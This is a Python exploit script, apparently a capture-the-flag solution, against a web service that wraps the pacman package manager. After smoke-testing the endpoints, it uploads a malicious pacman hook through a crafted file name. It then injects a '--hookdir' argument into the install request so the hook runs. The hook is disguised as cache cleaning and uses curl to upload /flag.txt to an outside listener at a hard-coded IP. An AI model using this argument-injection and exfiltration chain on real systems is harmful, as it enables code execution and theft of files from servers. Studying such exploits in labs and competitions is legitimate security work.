import requests
from os import system
from base64 import b64encode
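session = requests.Session()
# requests has no session-wide timeout: assigning `session.timeout` is silently
# ignored by the library, so on its own this line does nothing and every post()
# below could hang forever on a stalled target. The wrapper installed underneath
# makes the attribute effective. None preserves the original "wait
# indefinitely" behaviour; set a number of seconds here to bound each request.
session.timeout = None
_original_request = session.request


def _request_with_timeout(method, url, **kwargs):
    """Forward to the Session's request(), defaulting timeout= to session.timeout.

    A timeout= passed explicitly by the caller still wins.
    """
    kwargs.setdefault("timeout", session.timeout)
    return _original_request(method, url, **kwargs)


# Session.post() routes through self.request(), so shadowing the bound method
# on this instance is enough for every call below to pick the timeout up.
session.request = _request_with_timeout

# %-template for endpoint URLs; every request below does `target % "/path"`.
target = "http://localhost:5000%s"
# Real pacman package archive, read from the working directory, used as the
# benign upload in test_check().
local_wget = "wget-1.20.3-2-x86_64.pkg.tar.xz"
# pacman hook planted on the target by upload_hook(). It fires after any
# install/upgrade/remove transaction (Target = *, When = PostTransaction) and
# exfiltrates /flag.txt with an HTTP upload to the hard-coded address below --
# that host:port must be reachable from the target and have a listener waiting
# to catch the upload, otherwise the hook runs but nothing is received.
pacman_hook = """
[Trigger]
Operation = Upgrade
Operation = Install
Operation = Remove
Type = Package
Target = *
[Action]
Description = Cleaning pacman cache...
When = PostTransaction
Exec = /bin/bash -c "curl --upload-file /flag.txt http://192.168.10.70:5001"
"""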
def test_info():
    """Smoke-test /info: request the wget entry and expect its description in the reply."""
    print("Testing /info")
    url = target % "/info"
    payload = {'package': 'wget'}
    reply = session.post(url, json=payload)
    # The raw reply body is attached to the assertion so a failure shows what
    # the service actually returned.
    assert 'Description":"Network utility' in reply.text, reply.text
    print("info works")
def test_install():
    """Smoke-test /install with the benign wget package."""
    print("Testing /install")
    payload = {'package': 'wget'}
    reply = session.post(target % "/install", json=payload)
    # Loose substring match: any body containing "OK" passes. Tighten this once
    # the service's exact success response is known.
    assert "OK" in reply.text, reply.text
    print("install works")
def test_remove():
    """Smoke-test /remove.

    The endpoint is called with no request body. run_hook() relies on this call
    uninstalling wget -- verify that is what the service does.
    """
    print("Testing /remove")
    reply = session.post(target % "/remove")
    # Same loose "OK" substring check as the other smoke tests.
    assert "OK" in reply.text, reply.text
    print("remove works")
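def test_check():
    """Smoke-test /check by uploading the real wget package archive.

    The archive named by `local_wget` is read from the working directory,
    base64-encoded and sent as JSON. Raises FileNotFoundError if the archive
    is missing and AssertionError if the reply lacks "already satisfied".
    """
    print("Testing /check")
    # Context manager so the handle is closed even when the read fails
    # (the original never closed it).
    with open(local_wget, "rb") as archive:
        wget_b64 = b64encode(archive.read()).decode()
    upload_dict = {
        'name': 'wget',
        'content': wget_b64,
    }
    resp = session.post(target % "/check", json=upload_dict)
    # "already satisfied" is pacman's wording for a target that is already
    # installed; tests() runs test_install() before this, so wget should be.
    assert "already satisfied" in resp.text, resp.text
    print("check works")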
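def upload_hook():
    """Plant `pacman_hook` on the target through the /check upload.

    The upload name ' -d.hook' (note the leading space) makes the stored file
    end in ".hook", which pacman requires for hook files, so that run_hook()
    can later point pacman at the upload directory with --hookdir. The
    request is *expected* to fail with HTTP 500: the service's handling of
    the odd name apparently breaks after the file has been written, and only
    the write matters here -- confirm against the service that the file
    really lands in the directory run_hook() uses.

    Raises AssertionError when the status is not 500.
    """
    pac = b64encode(pacman_hook.encode()).decode()
    upload_dict = {
        'name': ' -d.hook',
        'content': pac,
    }
    resp = session.post(target % "/check", json=upload_dict)
    # Attach the body like the other assertions do, so an unexpected status
    # (e.g. the upload being rejected outright) is diagnosable.
    assert resp.status_code == 500, (resp.status_code, resp.text)
    print("Uploaded hook")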
def run_hook():
    """Fire the planted hook by running an install with an injected --hookdir.

    The `package` field is sent as a list; the service presumably splices it
    straight into pacman's argument vector, which is what lets --hookdir point
    pacman at the directory holding the uploaded hook. An "OK" reply only shows
    the install request went through -- the real success signal is the curl
    upload arriving at the listener named in `pacman_hook`.
    """
    print("Let's get code execution")
    # If wget is already installed the install is a no-op and the
    # PostTransaction hook never runs, so uninstall first.
    test_remove()
    injected_args = ["--hookdir", "/tmp/pacman/", "wget"]
    reply = session.post(target % "/install", json={'package': injected_args})
    assert "OK" in reply.text, reply.text
    print("looks good")
def tests():
    """Run the endpoint smoke tests in order.

    wget is installed a second time after the remove, presumably so that
    test_check() sees it present and gets the "already satisfied" reply.
    """
    steps = (test_info, test_install, test_remove, test_install, test_check)
    for step in steps:
        step()
def main():
    """Validate the service first, then plant the hook and trigger it."""
    tests()
    upload_hook()
    run_hook()


if __name__ == '__main__':
    main()